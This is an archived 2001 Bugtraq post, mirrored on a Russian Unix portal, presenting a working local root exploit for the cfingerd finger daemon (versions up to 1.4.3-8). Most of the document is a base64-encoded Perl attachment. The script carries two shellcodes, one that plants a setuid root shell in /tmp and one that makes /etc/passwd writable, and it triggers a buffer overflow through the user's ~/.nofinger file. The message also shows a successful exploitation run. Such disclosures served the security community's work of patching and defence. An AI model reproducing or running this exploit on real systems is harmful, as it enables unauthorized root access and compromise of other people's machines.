BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Новость: Рассказ об IP-адресации и работе с подсетями SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Wed, 11 Jul 2001 20:19:19 +0200
From: teleh0r <teleh0r@digit-labs.org>
To: BUGTRAQ@securityfocus.com
Subject: Another exploit for cfingerd <= 1.4.3-8

--------------Boundary-00=_7WMBB0RTU4NFH8WFIH40
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Dear bugtraq readers,

This is another exploit for the flaw found by Steven Van Acker.
http://www.securityfocus.com/archive/1/192844

In order to allow for more nops, I have constructed the payload
like this:

<82 nops><jmp 0x4><retaddr><shellcode>

[teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1
Address: 0xbffff46c
Exploit attempt succeeded!
[teleh0r@localhost teleh0r]#

Tested against cfingerd 1.4.3-8.

Sincerely yours,
teleh0r
http://www.digit-labs.org/teleh0r/
--------------Boundary-00=_7WMBB0RTU4NFH8WFIH40
Content-Type: application/x-perl;
  charset="iso-8859-1";
  name="cfingerd-exploit.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="cfingerd-exploit.pl"

IyEvdXNyL2Jpbi9wZXJsCgojIHwgTG9jYWwgYnVmZmVyIG92ZXJmbG93IGV4cGxvaXQgZm9yIGNm
aW5nZXJkCiMgfCBDb3B5cmlnaHQgKGMpIDIwMDEgYnkgPHRlbGVoMHJAZGlnaXQtbGFicy5vcmc+
CiMgfCBBbGwgcmlnaHRzIHJlc2VydmVkLgojIHwKIyB8IFNpbXBsZSBleHBsb2l0IGZvciB0aGUg
dnVsbmVyYWJpbGl0eSByZXBvcnRlZAojIHwgdG8gYnVndHJhcSBieSBTdGV2ZW4gVmFuIEFja2Vy
LgojIHwgaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9hcmNoaXZlLzEvMTkyODQ0CiMgfAoj
IHwgSWYgY2ZpbmdlcmQgZG9lcyBub3QgcnVuIGFzIHJvb3QsIHRoZSBleHBsb2l0CiMgfCB3aWxs
IG9mIGNvdXJzZSBmYWlsIQojIHwKIyB8IGh0dHA6Ly93d3cuZGlnaXQtbGFicy5vcmcvdGVsZWgw
ci8KCnVzZSBTb2NrZXQ7IHVzZSBGaWxlOjpDb3B5Owp1c2UgR2V0b3B0OjpTdGQ7IGdldG9wdHMo
J3M6cDpvOicsIFwlYXJnKTsKCmlmIChkZWZpbmVkKCRhcmd7J3MnfSkpIHsgJHNqZWxsICA9ICRh
cmd7J3MnfSB9CmlmIChkZWZpbmVkKCRhcmd7J3AnfSkpIHsgJHBvcnQgICA9ICRhcmd7J3AnfSB9
CmlmIChkZWZpbmVkKCRhcmd7J28nfSkpIHsgJG9mZnNldCA9ICRhcmd7J28nfSB9CgojIHNoZWxs
Y29kZXMgd3JpdHRlbiBieSBteXNlbGYgZXNwZWNpYWxseSBmb3IKIyB0aGlzIGV4cGxvaXQuCgoj
IDM0IGJ5dGVzCiRzaGVsbGNvZGUxID0KICAiXHgzMVx4ZGIiLiAgICAgICAgICAgICAgICAjIHhv
ciAgZWJ4LCBlYngKICAiXHgzMVx4YzkiLiAgICAgICAgICAgICAgICAjIHhvciAgZWN4LCBlY3gK
ICAiXHhmN1x4ZTMiLiAgICAgICAgICAgICAgICAjIG11bCAgZWJ4CiAgIlx4NTIiLiAgICAgICAg
ICAgICAgICAgICAgIyBwdXNoIGVkeAogICJceDY4XHgyZlx4MmZceDc5XHgzMCIuICAgICMgcHVz
aCBkd29yZCAweDMwNzkyZjJmCiAgIlx4NjhceDJmXHg3NFx4NmRceDcwIi4gICAgIyBwdXNoIGR3
b3JkIDB4NzA2ZDc0MmYKICAiXHg4OVx4ZTMiLiAgICAgICAgICAgICAgICAjIG1vdiAgZWJ4LCBl
c3AKICAiXHhiMFx4YjYiLiAgICAgICAgICAgICAgICAjIG1vdiAgYWwsIDB4YjYKICAiXHhjZFx4
ODAiLiAgICAgICAgICAgICAgICAjIGludCAgMHg4MAogICJceDY2XHhiOVx4ZWRceDBkIi4gICAg
ICAgICMgbW92ICBjeCwgMHhkZWQKICAiXHhiMFx4MGYiLiAgICAgICAgICAgICAgICAjIG1vdiAg
YWwsIDB4ZgogICJceGNkXHg4MCIuICAgICAgICAgICAgICAgICMgaW50ICAweDgwCiAgIlx4NDAi
LiAgICAgICAgICAgICAgICAgICAgIyBpbmMgIGVheAogICJceGNkXHg4MCI7ICAgICAgICAgICAg
ICAgICMgaW50ICAweDgwCgojIDM1IGJ5dGVzCiRzaGVsbGNvZGUyID0KICAiXHhlYlx4MTAiLiAg
ICAgICAgICAgICAgICAjIGptcCAgc2hvcnQgZmlsZQogICJceDViIi4gICAgICAgICAgICAgICAg
ICAgICMgcG9wICBlYngKICAiXHgzMVx4YzkiLiAgICAgICAgICAgICAgICAjIHhvciAgZWN4LCBl
Y3gKICAiXHhmN1x4ZTEiLiAgICAgICAgICAgICAgICAjIG11bCAgZWN4CiAgIlx4NjZceGI5XHhh
Nlx4MDEiLiAgICAgICAgIyBtb3YgIGN4LCAweDFhNgogICJceGIwXHgwZiIuICAgICAgICAgICAg
ICAgICMgbW92ICBhbCwgbW92CiAgIlx4Y2RceDgwIi4gICAgICAgICAgICAgICAgIyBpbnQgIDB4
ODAKICAiXHg0MCIuICAgICAgICAgICAgICAgICAgICAjIGluYyAgZWF4CiAgIlx4Y2RceDgwIi4g
ICAgICAgICAgICAgICAgIyBpbnQgIDB4ODAKICAiXHhlOFx4ZWJceGZmXHhmZlx4ZmYiLiAgICAj
IGNhbGwgY29kZQogICIvZXRjL3Bhc3N3ZCIuICAgICAgICAgICAgICMgc3RyaW5nCiAgIlx4MDAi
OyAgICAgICAgICAgICAgICAgICAgIyBudWxsIHRlcm1pbmF0ZQoKIyBjZmluZ2VyZCBkb2VzIG5v
dCBkcm9wIHByaXZpbGVnZXMgYmVmb3JlIHRoZSAKIyB2dWxuZXJhYmxlIGNvZGUga2lja3MgaW4s
IHRoZXJlZm9yZSBubyBuZWVkIAojIHRvIHVzZSBzZXR1aWQoMCk7CgppZiAoIShkZWZpbmVkKCRz
amVsbCkpfHwkc2plbGwgIX4gbS9eKDF8MikkLykgeyZ1c2FnZX0KJHNoZWxsY29kZSA9ICRzamVs
bCA9PSAxID8gJHNoZWxsY29kZTEgOiAkc2hlbGxjb2RlMjsKCiRwb3J0ICB8fD0gMjAwMzsKJHVz
ZXIgICAgPSBnZXRsb2dpbigpIHx8IGdldHB3dWlkKCQ8KTsKJHJldHVybiAgPSAweGJmZmZmNDZj
OwokbGVuZ3RoICA9IDg4Owoka2V3bG5vcCA9ICdLJzsKJGhvbWVkaXIgPSAoZ2V0cHduYW0oJHVz
ZXIpKVs3XTsKCnByaW50ZigiQWRkcmVzczogJSNseFxuIiwgKCRyZXR1cm4gKyAkb2Zmc2V0KSk7
CiZkb19jaGVja3o7CgppZiAoY29ubmVjdF9ob3N0KCcxMjcuMC4wLjEnLCAkcG9ydCkpIHsKICAg
ICZwcmVwYXJlX2F0dGFjazsKCiAgICBzZW5kKFNPQ0tFVCwgIiR1c2VyXDAxNVwwMTIiLCAwKTsK
ICAgIGNsb3NlKFNPQ0tFVCk7CgogICAgc2xlZXAoMSk7IAogICAgJmRvX2NoZWNrejsKCiAgICBk
aWUoIlNvcnJ5LCBleHBsb2l0IGZhaWxlZCAtIGNoZWNrIHRoZSB2YWx1ZXMuXG4iKTsKfQoKc3Vi
IHByZXBhcmVfYXR0YWNrIHsKICAgIGZvciAoJGkgPSAwOyAkaSA8ICgkbGVuZ3RoIC0gMiAtIDQp
OyAkaSsrKSB7CgkkYnVmZmVyIC49ICRrZXdsbm9wOwogICAgfQogICAgCiAgICAjPDgyJ25vcHMn
PjxqbXAgMHg0PjxyZXRhZGRyPjxzaGVsbGNvZGU+CgogICAgJGJ1ZmZlciAuPSAiXHhlYlx4MDQi
OwogICAgJGJ1ZmZlciAuPSBwYWNrKCdsJywgKCRyZXR1cm4gKyAkb2Zmc2V0KSk7CiAgICAkYnVm
ZmVyIC49ICRzaGVsbGNvZGU7CgogICAgaWYgKC1lKCIkaG9tZWRpci8ubm9maW5nZXIiKSkgeyAj
IEkgYW0gbmljZSwgaHVoPwoJY29weSgiJGhvbWVkaXIvLm5vZmluZ2VyIiwgIiRob21lZGlyLy5u
b2Zpbmdlci5CQUsiKTsKICAgIH0KICAgIAogICAgb3BlbihGSUxFLCAiPiRob21lZGlyLy5ub2Zp
bmdlciIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKICAgIHByaW50KEZJTEUgIlwkJGJ1ZmZlclxu
Iik7CiAgICBjbG9zZShGSUxFKTsgICAgCn0KCQpzdWIgZG9fY2hlY2t6IHsKICAgIGlmICgkc2pl
bGwgPT0gJzEnKSB7CglpZiAoLXUoIi90bXAveTAiKSAmJiAoc3RhdCgiL3RtcC95MCIpKVs0LDVd
ID09ICcwJykgewoJICAgIHByaW50KCJFeHBsb2l0IGF0dGVtcHQgc3VjY2VlZGVkIVxuIik7Cgkg
ICAgZXhlYygiL3RtcC95MCIpOwkgICAgCgl9IGVsc2lmIChzdGF0KCIvdG1wL3kwIikgPT0gJzAn
KSB7CgkgICAgY29weSgiL2Jpbi9zaCIsICIvdG1wL3kwIikgfHwgZGllKCJFcnJvcjogJCFcbiIp
OwoJfQogICAgfSBlbHNpZiAoJHNqZWxsID09ICcyJykgewoJaWYgKC13KCIvZXRjL3Bhc3N3ZCIp
KSB7CgkgICAgKCRwZXJtKSA9IChzcGxpdCgvXHMvLGBscyAtbGEgL2V0Yy9wYXNzd2RgKSlbMF07
CgkgICAgcHJpbnQoIlN1Y2Nlc3M6IC9ldGMvcGFzc3dkICRwZXJtXG4iKTsKCSAgICBleGl0KDAp
OwoJfQogICAgfSAKfQoKc3ViIHVzYWdlIHsKc3lzdGVtKCJjbGVhciIpOwoKIyBiZWxvdyBsYXlv
dXQgc3R5bGUgc3RvbGVuIGZyb20gcWl0ZXN0MSB4aW5ldGQgZXhwbG9pdCA7KQojIHdlcmQhCgpw
cmludChxcSgKY2ZpbmdlcmQgPD0gMS40LjMtOCBsb2NhbCBleHBsb2l0IGJ5IHRlbGVoMHIKQWxs
IHJpZ2h0cyByZXNlcnZlZC4KClVzYWdlOiAkMCBbb3B0aW9uc10KT3B0aW9uczoKICAtcyBzaGVs
bGNvZGUgIC0gc2VlIGJlbG93CiAgLXAgcG9ydCAgICAgICAtIDIwMDMgZGVmYXVsdAogIC1vIG9m
ZnNldCAKCkF2YWlsYWJsZSBzaGVsbGNvZGVzOgogIDFcKSByb290IHNoZWxsIGluIC90bXAKICAy
XCkgd3JpdGFibGUgL2V0Yy9wYXNzd2QKCikpOwpleGl0KDEpOwp9CgpzdWIgY29ubmVjdF9ob3N0
IHsKICAgICgkdGFyZ2V0LCAkcG9ydCkgPSBAXzsKICAgICRpYWRkciAgPSBpbmV0X2F0b24oJHRh
cmdldCkgICAgICAgICAgICAgICAgIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKICAgICRwYWRkciAg
PSBzb2NrYWRkcl9pbigkcG9ydCwgJGlhZGRyKSAgICAgICAgIHx8IGRpZSgiRXJyb3I6ICQhXG4i
KTsKICAgICRwcm90byAgPSBnZXRwcm90b2J5bmFtZSgndGNwJykgICAgICAgICAgICAgIHx8IGRp
ZSgiRXJyb3I6ICQhXG4iKTsKCiAgICBzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVB
TSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CiAgICBjb25uZWN0KFNPQ0tFVCwgJHBh
ZGRyKSAgICAgICAgICAgICAgICAgICAgICB8fCBkaWUoIkVycm9yOiAkIVxuIik7CiAgICByZXR1
cm4oMSk7Cn0K

--------------Boundary-00=_7WMBB0RTU4NFH8WFIH40--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД